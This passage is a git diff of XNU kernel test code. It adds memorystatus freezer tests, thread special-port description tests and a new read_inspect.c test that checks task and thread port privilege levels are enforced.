-       take_jetsam_snapshot_ownership();
+       set_testing_pid();
 
        test_after_background_helper_launches(false, "frozen_background", ^{
                int ret;
@@ -1017,11 +1031,6 @@ T_HELPER_DECL(check_frozen, "Check frozen state", T_META_ASROOT(true)) {
        /* Set the process to freezable */
        kern_ret = memorystatus_control(MEMORYSTATUS_CMD_SET_PROCESS_IS_FREEZABLE, getpid(), 1, NULL, 0);
        T_QUIET; T_ASSERT_POSIX_SUCCESS(kern_ret, "set process is freezable");
-       /* Signal to our parent that we can be frozen */
-       if (kill(getppid(), SIGUSR1) != 0) {
-               T_LOG("Unable to signal to parent process!");
-               exit(SIGNAL_TO_PARENT_FAILED);
-       }
 
        /* We should not be frozen yet. */
        is_frozen = memorystatus_control(MEMORYSTATUS_CMD_GET_PROCESS_IS_FROZEN, getpid(), 0, NULL, 0);
@@ -1033,9 +1042,6 @@ T_HELPER_DECL(check_frozen, "Check frozen state", T_META_ASROOT(true)) {
                exit(FROZEN_BIT_SET);
        }
 
-
-       sig_t sig_ret = signal(SIGUSR1, SIG_IGN);
-       T_QUIET; T_WITH_ERRNO; T_ASSERT_NE(sig_ret, SIG_ERR, "signal(SIGUSR1, SIG_IGN)");
        ds_signal = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, SIGUSR1, 0, dispatch_get_main_queue());
        if (ds_signal == NULL) {
                exit(DISPATCH_SOURCE_CREATE_FAILED);
@@ -1055,6 +1061,15 @@ T_HELPER_DECL(check_frozen, "Check frozen state", T_META_ASROOT(true)) {
        });
        dispatch_activate(ds_signal);
 
+       sig_t sig_ret = signal(SIGUSR1, SIG_IGN);
+       T_QUIET; T_WITH_ERRNO; T_ASSERT_NE(sig_ret, SIG_ERR, "signal(SIGUSR1, SIG_IGN)");
+
+       /* Signal to our parent that we can be frozen */
+       if (kill(getppid(), SIGUSR1) != 0) {
+               T_LOG("Unable to signal to parent process!");
+               exit(SIGNAL_TO_PARENT_FAILED);
+       }
+
        dispatch_main();
 }
 
@@ -1074,4 +1089,191 @@ T_DECL(memorystatus_get_process_is_frozen, "MEMORYSTATUS_CMD_GET_PROCESS_IS_FROZ
                kill(child_pid, SIGUSR1);
                /* The child will checks its own frozen state & exit. */
        });
+       dispatch_main();
+}
+
+static unsigned int freeze_pages_min_old;
+static int throttle_enabled_old;
+static void
+cleanup_memorystatus_freeze_top_process(void)
+{
+       sysctlbyname("kern.memorystatus_freeze_pages_min", NULL, NULL, &freeze_pages_min_old, sizeof(freeze_pages_min_old));
+       sysctlbyname("kern.memorystatus_freeze_throttle_enabled", NULL, NULL, &throttle_enabled_old, sizeof(throttle_enabled_old));
+}
+
+#define P_MEMSTAT_FROZEN 0x00000002
+T_DECL(memorystatus_freeze_top_process, "memorystatus_freeze_top_process chooses the correct process",
+    T_META_ASROOT(true),
+    T_META_REQUIRES_SYSCTL_EQ("kern.development", 1),
+    T_META_REQUIRES_SYSCTL_EQ("vm.freeze_enabled", 1)) {
+       int32_t memorystatus_freeze_band = 0;
+       size_t memorystatus_freeze_band_size = sizeof(memorystatus_freeze_band);
+       size_t freeze_pages_min_size = sizeof(freeze_pages_min_old);
+       unsigned int freeze_pages_min_new = 0;
+       size_t throttle_enabled_old_size = sizeof(throttle_enabled_old);
+       int throttle_enabled_new = 1;
+       __block errno_t ret;
+       __block int maxproc;
+       size_t maxproc_size = sizeof(maxproc);
+
+       ret = sysctlbyname("kern.maxproc", &maxproc, &maxproc_size, NULL, 0);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "kern.maxproc");
+       sysctlbyname("kern.memorystatus_freeze_jetsam_band", &memorystatus_freeze_band, &memorystatus_freeze_band_size, NULL, 0);
+
+       /* Set min pages to 0 and disable the budget to ensure we can always freeze the child. */
+       ret = sysctlbyname("kern.memorystatus_freeze_pages_min", &freeze_pages_min_old, &freeze_pages_min_size, &freeze_pages_min_new, sizeof(freeze_pages_min_new));
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "set kern.memorystatus_freeze_pages_min");
+       ret = sysctlbyname("kern.memorystatus_freeze_throttle_enabled", &throttle_enabled_old, &throttle_enabled_old_size, &throttle_enabled_new, sizeof(throttle_enabled_new));
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "set kern.memorystatus_freeze_throttle_enabled");
+       T_ATEND(cleanup_memorystatus_freeze_top_process);
+       /* Take ownership of the freezer probabilities for the duration of the test so that we don't race with dasd. */
+       set_testing_pid();
+       test_after_background_helper_launches(true, "frozen_background", ^{
+               int32_t child_band = JETSAM_PRIORITY_DEFAULT;
+               /* Place the child in the idle band so that it gets elevated like a typical app. */
+               move_to_idle_band(child_pid);
+               ret = pid_suspend(child_pid);
+               T_ASSERT_POSIX_SUCCESS(ret, "child suspended");
+
+               size_t buffer_len = sizeof(memorystatus_properties_entry_v1_t) * (size_t) maxproc;
+               memorystatus_properties_entry_v1_t *properties_list = malloc(buffer_len);
+               T_QUIET; T_ASSERT_NOTNULL(properties_list, "malloc properties array");
+               size_t properties_list_len = 0;
+               /* The child needs to age down into the idle band before it's eligible to be frozen. */
+               T_LOG("Waiting for child to age into the idle band.");
+               while (child_band != JETSAM_PRIORITY_IDLE) {
+                       memset(properties_list, 0, buffer_len);
+                       properties_list_len = 0;
+                       memorystatus_jetsam_snapshot_t *snapshot = get_jetsam_snapshot(MEMORYSTATUS_FLAGS_SNAPSHOT_ON_DEMAND, false);
+
+                       bool found = false;
+                       for (size_t i = 0; i < snapshot->entry_count; i++) {
+                               memorystatus_jetsam_snapshot_entry_t *snapshot_entry = &snapshot->entries[i];
+                               if (snapshot_entry->priority <= memorystatus_freeze_band && !snapshot_entry->killed) {
+                                       pid_t pid = snapshot_entry->pid;
+                                       memorystatus_properties_entry_v1_t *property_entry = &properties_list[properties_list_len++];
+                                       property_entry->version = 1;
+                                       property_entry->pid = pid;
+                                       if (pid == child_pid) {
+                                               found = true;
+                                               property_entry->use_probability = 1;
+                                               child_band = snapshot_entry->priority;
+                                       } else {
+                                               property_entry->use_probability = 0;
+                                       }
+                                       strncpy(property_entry->proc_name, snapshot_entry->name, MAXCOMLEN);
+                                       property_entry->proc_name[MAXCOMLEN] = '\0';
+                               }
+                       }
+                       T_QUIET; T_ASSERT_TRUE(found, "Child is in the on-demand snapshot");
+                       free(snapshot);
+               }
+               ret = memorystatus_control(MEMORYSTATUS_CMD_GRP_SET_PROPERTIES, 0, MEMORYSTATUS_FLAGS_GRP_SET_PROBABILITY, properties_list, sizeof(memorystatus_properties_entry_v1_t) * properties_list_len);
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "MEMORYSTATUS_FLAGS_GRP_SET_PROBABILITY");
+               free(properties_list);
+               int val = 1;
+               ret = sysctlbyname("vm.memorystatus_freeze_top_process", NULL, NULL, &val, sizeof(val));
+               T_ASSERT_POSIX_SUCCESS(ret, "freeze_top_process");
+               /* Verify that the process was frozen. */
+               memorystatus_jetsam_snapshot_t *snapshot = get_jetsam_snapshot(MEMORYSTATUS_FLAGS_SNAPSHOT_ON_DEMAND, false);
+               memorystatus_jetsam_snapshot_entry_t *entry = get_jetsam_snapshot_entry(snapshot, child_pid);
+               T_ASSERT_NOTNULL(entry, "child is in snapshot");
+               if (!(entry->state & P_MEMSTAT_FROZEN)) {
+                       T_LOG("Not frozen. Skip reason: %d", entry->jse_freeze_skip_reason);
+               }
+               T_ASSERT_TRUE(entry->state & P_MEMSTAT_FROZEN, "child is frozen");
+               free(snapshot);
+               ret = pid_resume(child_pid);
+               T_ASSERT_POSIX_SUCCESS(ret, "child resumed after freeze");
+
+               /* Kill the child */
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(child_pid, SIGKILL), "Killed child process");
+               T_END;
+       });
+       dispatch_main();
+}
+
+static int
+memorystatus_freezer_thaw_percentage(void)
+{
+       int val;
+       size_t size = sizeof(val);
+       int ret = sysctlbyname("kern.memorystatus_freezer_thaw_percentage", &val, &size, NULL, 0);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "failed to query kern.memorystatus_freezer_thaw_percentage");
+       return val;
+}
+
+static void
+reset_interval(void)
+{
+       uint32_t freeze_daily_budget_mb = 0;
+       size_t size = sizeof(freeze_daily_budget_mb);
+       int ret;
+       uint64_t new_budget;
+       ret = sysctlbyname("kern.memorystatus_freeze_daily_mb_max", &freeze_daily_budget_mb, &size, NULL, 0);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "failed to query kern.memorystatus_freeze_daily_mb_max");
+       new_budget = (freeze_daily_budget_mb * (1UL << 20) / vm_page_size);
+       ret = sysctlbyname("kern.memorystatus_freeze_budget_pages_remaining", NULL, NULL, &new_budget, sizeof(new_budget));
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "failed to set kern.memorystatus_freeze_budget_pages_remaining");
+}
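+
+/*
+ * For example, assuming a 1024 MB daily budget and 16 KB pages,
+ * reset_interval() writes 1024 * 2^20 / 16384 = 65536 pages back into
+ * kern.memorystatus_freeze_budget_pages_remaining, which the tests below
+ * use to start a new freezer interval.
+ */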
+
+static pid_t second_child;
+static void
+cleanup_memorystatus_freezer_thaw_percentage(void)
+{
+       kill(second_child, SIGKILL);
+}
+
+T_DECL(memorystatus_freezer_thaw_percentage, "memorystatus_freezer_thaw_percentage updates correctly",
+    T_META_ASROOT(true),
+    T_META_REQUIRES_SYSCTL_EQ("kern.development", 1),
+    T_META_REQUIRES_SYSCTL_EQ("vm.freeze_enabled", 1)) {
+       __block dispatch_source_t first_signal_block;
+       /* Take ownership of the freezer probabilities for the duration of the test so that nothing new gets frozen by dasd. */
+       set_testing_pid();
+       reset_interval();
+
+       /* Spawn one child that will remain frozen throughout the whole test & another that will be thawed. */
+       first_signal_block = run_block_after_signal(SIGUSR1, ^{
+               move_to_idle_band(second_child);
+               __block int ret = pid_suspend(second_child);
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child suspended");
+               freeze_process(second_child);
+               T_QUIET; T_ASSERT_EQ(memorystatus_freezer_thaw_percentage(), 0, "thaw percentage is still 0 after freeze");
+               dispatch_source_cancel(first_signal_block);
+               test_after_background_helper_launches(true, "frozen_background", ^{
+                       reset_interval();
+                       T_QUIET; T_ASSERT_EQ(memorystatus_freezer_thaw_percentage(), 0, "new interval starts with a thaw percentage of 0");
+                       move_to_idle_band(child_pid);
+                       ret = pid_suspend(child_pid);
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child suspended");
+                       freeze_process(child_pid);
+                       ret = pid_resume(child_pid);
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child resumed after freeze");
+                       int percentage_after_thaw = memorystatus_freezer_thaw_percentage();
+                       T_QUIET; T_ASSERT_GT(percentage_after_thaw, 0, "thaw percentage is higher after thaw");
+
+                       ret = pid_suspend(child_pid);
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child suspended");
+                       freeze_process(child_pid);
+                       ret = pid_resume(child_pid);
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child resumed after freeze");
+                       T_QUIET; T_ASSERT_EQ(memorystatus_freezer_thaw_percentage(), percentage_after_thaw, "thaw percentage is unchanged after second thaw");
+
+                       ret = pid_suspend(child_pid);
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child suspended");
+                       freeze_process(child_pid);
+                       reset_interval();
+                       T_QUIET; T_ASSERT_EQ(memorystatus_freezer_thaw_percentage(), 0, "new interval starts with a 0 thaw percentage");
+                       ret = pid_resume(child_pid);
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child resumed after freeze");
+                       T_QUIET; T_ASSERT_GT(memorystatus_freezer_thaw_percentage(), 0, "thaw percentage goes back up in new interval");
+
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(child_pid, SIGKILL), "failed to kill child");
+                       T_END;
+               });
+       });
+
+       second_child = launch_background_helper("frozen_background");
+       T_ATEND(cleanup_memorystatus_freezer_thaw_percentage);
+       dispatch_activate(first_signal_block);
+       dispatch_main();
 }
index b14feabddb023949ffc57a26ef079b4950b0e7c2..7574fee55ff073a838453ac5436b79f2811ad991 100644 (file)
@@ -122,8 +122,8 @@ memorystatus_assertion_test_repetitive(char *test, boolean_t turn_on_dirty_track
        pid_t mypid = getpid();
 
        /* these values will remain fixed during testing */
-       int             active_limit_mb = 15;   /* arbitrary */
-       int             inactive_limit_mb = 10;  /* arbitrary */
+       int             active_limit_mb = 35;   /* arbitrary */
+       int             inactive_limit_mb = 25;  /* arbitrary */
 
        /* these values may vary during test */
        int             requestedpriority = 0;
@@ -224,8 +224,8 @@ memorystatus_assertion_test_allow_idle_exit()
        pid_t mypid = getpid();
 
        /* these values will remain fixed during testing */
-       int active_limit_mb   = 15; /* arbitrary */
-       int inactive_limit_mb = 10;  /* arbitrary */
+       int active_limit_mb   = 35; /* arbitrary */
+       int inactive_limit_mb = 25;  /* arbitrary */
 
        /* these values may vary during test */
        int requestedpriority = JETSAM_PRIORITY_UI_SUPPORT;
@@ -349,8 +349,8 @@ memorystatus_assertion_test_do_not_allow_idle_exit()
        pid_t mypid = getpid();
 
        /* these values will remain fixed during testing */
-       int             active_limit_mb = 15;   /* arbitrary */
-       int             inactive_limit_mb = 10;  /* arbitrary */
+       int             active_limit_mb = 35;   /* arbitrary */
+       int             inactive_limit_mb = 25;  /* arbitrary */
        int             requestedpriority = JETSAM_PRIORITY_AUDIO_AND_ACCESSORY;
 
        T_SETUPBEGIN;
index ff73724cdf7467907d6264f67a634bd000064668..65f29b569fa7e7e392abe45c606b7188aa61bca5 100644 (file)
@@ -16,6 +16,8 @@
 #include <darwintest.h>
 #include <darwintest_utils.h>
 
+#include "test_utils.h"
+
 T_GLOBAL_META(
        T_META_NAMESPACE("xnu.vm"),
        T_META_CHECK_LEAKS(false)
@@ -77,25 +79,6 @@ static char *child_exit_why[] = {
        "malloc() failed",
 };
 
-/*
- * Corpse collection only happens in development kernels.
- * So we need this to detect if the test is relevant.
- */
-static boolean_t
-is_development_kernel(void)
-{
-       int ret;
-       int dev = 0;
-       size_t dev_size = sizeof(dev);
-
-       ret = sysctlbyname("kern.development", &dev, &dev_size, NULL, 0);
-       if (ret != 0) {
-               return FALSE;
-       }
-
-       return dev != 0;
-}
-
 /*
  * Set/Get the sysctl used to determine if corpse collection occurs.
  * This is done by the kernel checking for a specific PID.
index db0613f961c868f98ad7886793dabbb913b002c8..9b86fe53ffa4e71c77bab96eab85add48d0dc25b 100644 (file)
@@ -8,6 +8,8 @@
 #include <TargetConditionals.h>
 #include <perfcheck_keys.h>
 
+#include "benchmark/helpers.h"
+
 T_GLOBAL_META(
        T_META_NAMESPACE("xnu.vm.perf"),
        T_META_CHECK_LEAKS(false),
@@ -74,7 +76,6 @@ static void execute_threads(void);
 static void *thread_setup(void *arg);
 static void run_test(int fault_type, int mapping_variant, size_t memsize);
 static void setup_and_run_test(int test, int threads);
-static int get_ncpu(void);
 
 /* Allocates memory using the default mmap behavior. Each VM region created is capped at 128 MB. */
 static void
@@ -410,17 +411,6 @@ setup_and_run_test(int fault_type, int threads)
        T_END;
 }
 
-static int
-get_ncpu(void)
-{
-       int ncpu;
-       size_t length = sizeof(ncpu);
-
-       T_QUIET; T_ASSERT_POSIX_SUCCESS(sysctlbyname("hw.ncpu", &ncpu, &length, NULL, 0),
-           "failed to query hw.ncpu");
-       return ncpu;
-}
-
 T_DECL(read_soft_fault,
     "Read soft faults (single thread)")
 {
index 55d3c12b1199037d4dc7b39e27f1d0153b33dca7..64bbab2711ad518e900c6ff96e184175cdc899e1 100644 (file)
@@ -76,10 +76,11 @@ T_DECL(host_special_port_descriptions,
        TEST_HSP(HOST_SYSPOLICYD_PORT);
        TEST_HSP(HOST_FILECOORDINATIOND_PORT);
        TEST_HSP(HOST_FAIRPLAYD_PORT);
+       TEST_HSP(HOST_IOCOMPRESSIONSTATS_PORT);
 
 #undef TEST_HSP
 
-       T_EXPECT_EQ(HOST_FAIRPLAYD_PORT, HOST_MAX_SPECIAL_PORT,
+       T_EXPECT_EQ(HOST_IOCOMPRESSIONSTATS_PORT, HOST_MAX_SPECIAL_PORT,
            "checked all of the ports");
 
        const char *invalid_hsp =
@@ -96,6 +97,8 @@ T_DECL(task_special_port_descriptions,
                portdef, #portdef)
 
        TEST_TSP(TASK_KERNEL_PORT);
+       TEST_TSP(TASK_READ_PORT);
+       TEST_TSP(TASK_INSPECT_PORT);
        TEST_TSP(TASK_HOST_PORT);
        TEST_TSP(TASK_NAME_PORT);
        TEST_TSP(TASK_BOOTSTRAP_PORT);
@@ -115,6 +118,28 @@ T_DECL(task_special_port_descriptions,
            "invalid task special port description should be NULL");
 }
 
+T_DECL(thread_special_port_descriptions,
+    "verify that thread special ports can be described")
+{
+#define TEST_TSP(portdef) \
+               expect_special_port_description(mach_thread_special_port_description, \
+               portdef, #portdef)
+
+       TEST_TSP(THREAD_KERNEL_PORT);
+       TEST_TSP(THREAD_READ_PORT);
+       TEST_TSP(THREAD_INSPECT_PORT);
+
+#undef TEST_TSP
+
+       T_EXPECT_EQ(THREAD_READ_PORT, THREAD_MAX_SPECIAL_PORT,
+           "checked all of the ports");
+
+       const char *invalid_tsp =
+           mach_thread_special_port_description(THREAD_MAX_SPECIAL_PORT + 1);
+       T_EXPECT_NULL(invalid_tsp,
+           "invalid thread special port description should be NULL");
+}
+
 static void
 expect_special_port_id(int (*fn)(const char *id), int port, const char *portid)
 {
@@ -172,6 +197,8 @@ T_DECL(task_special_port_mapping,
                portdef, #portdef)
 
        TEST_TSP(TASK_KERNEL_PORT);
+       TEST_TSP(TASK_READ_PORT);
+       TEST_TSP(TASK_INSPECT_PORT);
        TEST_TSP(TASK_HOST_PORT);
        TEST_TSP(TASK_NAME_PORT);
        TEST_TSP(TASK_BOOTSTRAP_PORT);
@@ -186,3 +213,21 @@ T_DECL(task_special_port_mapping,
        T_EXPECT_EQ(invalid_tsp, -1,
            "invalid task special port IDs should return -1");
 }
+
+T_DECL(thread_special_port_mapping,
+    "verify that thread special port names can be mapped to numbers")
+{
+#define TEST_TSP(portdef) \
+               expect_special_port_id(mach_thread_special_port_for_id, \
+               portdef, #portdef)
+
+       TEST_TSP(THREAD_KERNEL_PORT);
+       TEST_TSP(THREAD_READ_PORT);
+       TEST_TSP(THREAD_INSPECT_PORT);
+
+#undef TEST_TSP
+
+       int invalid_tsp = mach_thread_special_port_for_id("BOGUS_SPECIAL_PORT_NAME");
+       T_EXPECT_EQ(invalid_tsp, -1,
+           "invalid thread special port IDs should return -1");
+}
index e8615016cca4a233b31d1bbe39fecf3f558b7885..9b1b26141b6513170dd88678ffdcf817b56feff7 100644 (file)
@@ -4,6 +4,8 @@
 #include <string.h>
 #include <errno.h>
 
+#include "test_utils.h"
+
 /*
  * Any change to this structure must be reflected in iBoot / MacEFI / PanicDump / XNU Tests and vice versa.
  */
@@ -39,21 +41,6 @@ check_for_substrings(const char* string, size_t len)
        return res;
 }
 
-static boolean_t
-is_development_kernel(void)
-{
-       int ret;
-       int dev = 0;
-       size_t dev_size = sizeof(dev);
-
-       ret = sysctlbyname("kern.development", &dev, &dev_size, NULL, 0);
-       if (ret != 0) {
-               return FALSE;
-       }
-
-       return dev != 0;
-}
-
 /*
  *       Valid cases:
  *       1. Development & Debug iBoot/macEFI provides a preoslog buffer.
index d864d85319665ef4cad611bee8fe680869fb030d..18f54d76d3dd15b441d630cb63a7970342bed75c 100644 (file)
@@ -68,9 +68,9 @@ T_DECL(test_quiescent_counter, "Validate that _COMM_PAGE_CPU_QUIESCENT_COUNTER i
 
        T_ASSERT_GT(cpu_checkin_min_interval, 0, "kern.cpu_checkin_interval should be > 0");
 
-       uint64_t* commpage_addr = (uint64_t *)(uintptr_t)_COMM_PAGE_CPU_QUIESCENT_COUNTER;
+       COMM_PAGE_SLOT_TYPE(uint64_t) commpage_addr = COMM_PAGE_SLOT(uint64_t, CPU_QUIESCENT_COUNTER);
 
-       T_LOG("address of _COMM_PAGE_CPU_QUIESCENT_COUNTER is %p", (void*) commpage_addr);
+       T_LOG("address of _COMM_PAGE_CPU_QUIESCENT_COUNTER is %p", commpage_addr);
 
        uint64_t counter = *commpage_addr;
        uint64_t last_counter = counter;
diff --git a/tests/read_inspect.c b/tests/read_inspect.c
new file mode 100644 (file)
index 0000000..82b3751
--- /dev/null
@@ -0,0 +1,630 @@
+#include <darwintest.h>
+
+#include <mach/host_priv.h>
+#include <mach/mach.h>
+#include <mach/mach_types.h>
+#include <mach/mach_vm.h>
+#include <mach_debug/ipc_info.h>
+#include <mach/processor_set.h>
+#include <mach/task.h>
+#include <signal.h>
+#include <sys/wait.h>
+#include <sys/proc.h>
+#include <sys/sysctl.h>
+#include <unistd.h>
+#include <TargetConditionals.h>
+
+#define IKOT_THREAD_CONTROL             1
+#define IKOT_THREAD_READ                47
+#define IKOT_THREAD_INSPECT             46
+
+#define IKOT_TASK_CONTROL               2
+#define IKOT_TASK_READ                  45
+#define IKOT_TASK_INSPECT               44
+#define IKOT_TASK_NAME                  20
+
+
+/*
+ * This test verifies various security properties for task and thread
+ * read/inspect interfaces. Specifically, it checks and makes sure:
+ *
+ * 1. Task/thread can't get higher priv'ed ports from lower ones through
+ * {task, thread}_get_special_port()
+ * 2. Correct level of thread ports are returned from task_threads() with
+ * a given task port flavor
+ * 3. Correct level of task ports are returned from processor_set_tasks()
+ * 4. MIG intrans conversion and enforcement for task/thread port does not break.
+ * 5. task_{, read, inspect, name}_for_pid() works for self and other processes
+ * 6. The new mach_vm_remap_new interface behaves correctly
+ */
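+
+/*
+ * As a minimal sketch of how the helpers below are exercised (assuming the
+ * current process), a read-flavored port for the caller can be obtained and
+ * passed in:
+ *
+ *     mach_port_t read_port = MACH_PORT_NULL;
+ *     kern_return_t kr = task_read_for_pid(mach_task_self(), getpid(), &read_port);
+ *     if (kr == KERN_SUCCESS) {
+ *             test_task_get_special_port(read_port, TASK_FLAVOR_READ);
+ *             mach_port_deallocate(mach_task_self(), read_port);
+ *     }
+ */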
+
+T_GLOBAL_META(
+       T_META_NAMESPACE("xnu.ipc"),
+       T_META_RUN_CONCURRENTLY(TRUE));
+
+static void
+RESULT_CHECK(
+       kern_return_t kr,
+       unsigned int flavor,  /* task_flavor_t or thread_flavor_t */
+       unsigned int required, /* task_flavor_t or thread_flavor_t */
+       char *f_name)
+{
+       if (flavor <= required) {
+               T_EXPECT_EQ(kr, KERN_SUCCESS, "%s should succeed with task/thread flavor %d, kr: 0x%x", f_name, flavor, kr);
+       } else {
+               T_EXPECT_NE(kr, KERN_SUCCESS, "%s should fail with task/thread flavor %d, kr: 0x%x", f_name, flavor, kr);
+       }
+}
+
+static void
+test_task_get_special_port(
+       task_t  tport,
+       task_flavor_t flavor)
+{
+       kern_return_t kr;
+       mach_port_t special_port = MACH_PORT_NULL;
+       mach_port_t tfp_port = MACH_PORT_NULL;
+
+       T_LOG("Testing task_get_special_port() with task flavor %d", flavor);
+       /* gettable with at least control port */
+       kr = task_get_special_port(tport, TASK_KERNEL_PORT, &special_port);
+       RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "task_get_special_port(TASK_KERNEL_PORT)");
+       mach_port_deallocate(mach_task_self(), special_port);
+       special_port = MACH_PORT_NULL;
+
+       kr = task_get_special_port(tport, TASK_BOOTSTRAP_PORT, &special_port);
+       RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "task_get_special_port(TASK_BOOTSTRAP_PORT)");
+       mach_port_deallocate(mach_task_self(), special_port);
+       special_port = MACH_PORT_NULL;
+
+       kr = task_get_special_port(tport, TASK_HOST_PORT, &special_port);
+       RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "task_get_special_port(TASK_HOST_PORT)");
+       mach_port_deallocate(mach_task_self(), special_port);
+       special_port = MACH_PORT_NULL;
+
+       /* gettable with at least read port */
+       kr = task_get_special_port(tport, TASK_READ_PORT, &special_port);
+       RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "task_get_special_port(TASK_READ_PORT)");
+       if (KERN_SUCCESS == kr) {
+               kr = task_read_for_pid(mach_task_self(), getpid(), &tfp_port);
+               T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_read_for_pid()");
+               T_QUIET; T_EXPECT_EQ(tfp_port, special_port, "task_read_for_pid() should match TASK_READ_PORT");
+               mach_port_deallocate(mach_task_self(), tfp_port);
+       }
+       mach_port_deallocate(mach_task_self(), special_port);
+       special_port = MACH_PORT_NULL;
+
+       /* gettable with at least inspect port */
+       kr = task_get_special_port(tport, TASK_INSPECT_PORT, &special_port);
+       RESULT_CHECK(kr, flavor, TASK_FLAVOR_INSPECT, "task_get_special_port(TASK_INSPECT_PORT)");
+       if (KERN_SUCCESS == kr) {
+               kr = task_inspect_for_pid(mach_task_self(), getpid(), &tfp_port);
+               T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_inspect_for_pid()");
+               T_QUIET; T_EXPECT_EQ(tfp_port, special_port, "task_inspect_for_pid() should match TASK_INSPECT_PORT");
+               mach_port_deallocate(mach_task_self(), tfp_port);
+       }
+       mach_port_deallocate(mach_task_self(), special_port);
+       special_port = MACH_PORT_NULL;
+
+       /* gettable with at least name port */
+       kr = task_get_special_port(tport, TASK_NAME_PORT, &special_port);
+       RESULT_CHECK(kr, flavor, TASK_FLAVOR_INSPECT, "task_get_special_port(TASK_NAME_PORT)");
+       if (KERN_SUCCESS == kr) {
+               kr = task_name_for_pid(mach_task_self(), getpid(), &tfp_port);
+               T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_name_for_pid()");
+               T_QUIET; T_EXPECT_EQ(tfp_port, special_port, "task_name_for_pid() should match TASK_NAME_PORT");
+               mach_port_deallocate(mach_task_self(), tfp_port);
+       }
+       mach_port_deallocate(mach_task_self(), special_port);
+       special_port = MACH_PORT_NULL;
+}
+
+static void
+test_thread_get_special_port(
+       thread_t  tport,
+       thread_flavor_t flavor)
+{
+       kern_return_t kr;
+       mach_port_t special_port = MACH_PORT_NULL;
+
+       T_LOG("Testing thread_get_special_port() with thread flavor %d", flavor);
+       /* gettable with at least control port */
+       kr = thread_get_special_port(tport, THREAD_KERNEL_PORT, &special_port);
+       RESULT_CHECK(kr, flavor, THREAD_FLAVOR_CONTROL, "thread_get_special_port(THREAD_KERNEL_PORT)");
+       mach_port_deallocate(mach_task_self(), special_port);
+       special_port = MACH_PORT_NULL;
+
+       /* gettable with at least read port */
+       kr = thread_get_special_port(tport, THREAD_READ_PORT, &special_port);
+       RESULT_CHECK(kr, flavor, THREAD_FLAVOR_READ, "thread_get_special_port(THREAD_READ_PORT)");
+       mach_port_deallocate(mach_task_self(), special_port);
+       special_port = MACH_PORT_NULL;
+
+       /* gettable with at least inspect port */
+       kr = thread_get_special_port(tport, THREAD_INSPECT_PORT, &special_port);
+       RESULT_CHECK(kr, flavor, THREAD_FLAVOR_INSPECT, "thread_get_special_port(THREAD_INSPECT_PORT)");
+       mach_port_deallocate(mach_task_self(), special_port);
+       special_port = MACH_PORT_NULL;
+}
+
+static void
+test_task_threads(
+       task_t  tport,
+       task_flavor_t flavor)
+{
+       kern_return_t kr;
+       thread_array_t threadList;
+       mach_msg_type_number_t threadCount = 0;
+
+       unsigned int kotype;
+       unsigned int kaddr;
+
+       T_LOG("Testing task_threads() with task flavor %d", flavor);
+
+       kr = task_threads(tport, &threadList, &threadCount);
+       RESULT_CHECK(kr, flavor, TASK_FLAVOR_INSPECT, "task_threads");
+
+       if (kr) {
+               T_LOG("task_threads failed, skipping test_task_threads()");
+               return;
+       }
+
+       T_QUIET; T_ASSERT_GE(threadCount, 1, "threadCount should be at least 1");
+
+       /*
+        * TASK_FLAVOR_CONTROL -> THREAD_FLAVOR_CONTROL
+        * TASK_FLAVOR_READ    -> THREAD_FLAVOR_READ
+        * TASK_FLAVOR_INSPECT -> THREAD_FLAVOR_INSPECT
+        * TASK_FLAVOR_NAME    -> KERN_FAILURE
+        */
+       for (size_t i = 0; i < threadCount; i++) {
+               kr = mach_port_kernel_object(mach_task_self(), threadList[i], &kotype, &kaddr);
+               if (kr == KERN_INVALID_RIGHT) {
+                       /* thread port is inactive */
+                       T_LOG("thread port name 0x%x is inactive", threadList[i]);
+                       continue;
+               } else if (kr) {
+                       T_FAIL("mach_port_kernel_object() failed with kr: 0x%x", kr);
+               }
+               switch (flavor) {
+               case TASK_FLAVOR_CONTROL:
+                       T_QUIET; T_EXPECT_EQ(kotype, IKOT_THREAD_CONTROL, "Task control port should yield thread control port");
+                       break;
+               case TASK_FLAVOR_READ:
+                       T_QUIET; T_EXPECT_EQ(kotype, IKOT_THREAD_READ, "Task read port should yield thread read port");
+                       break;
+               case TASK_FLAVOR_INSPECT:
+                       T_QUIET; T_EXPECT_EQ(kotype, IKOT_THREAD_INSPECT, "Task inspect port should yield thread inspect port");
+                       break;
+               default:
+                       T_FAIL("task_threads() returned thread ports with task name port??");
+                       break;
+               }
+       }
+
+       for (size_t i = 0; i < threadCount; i++) {
+               mach_port_deallocate(mach_task_self(), threadList[i]);
+       }
+}
+
+static void
+test_processor_set_tasks(
+       task_flavor_t flavor)
+{
+       kern_return_t kr;
+       processor_set_name_array_t psets;
+       processor_set_t        pset_priv;
+       task_array_t taskList;
+       mach_msg_type_number_t pcnt = 0, tcnt = 0;
+       mach_port_t host = mach_host_self();
+
+       unsigned int kotype;
+       unsigned int kaddr;
+
+       T_LOG("Testing processor_set_tasks() with task flavor %d", flavor);
+
+       kr = host_processor_sets(host, &psets, &pcnt);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "host_processor_sets");
+       T_QUIET; T_ASSERT_GE(pcnt, 1, "should have at least 1 processor set");
+
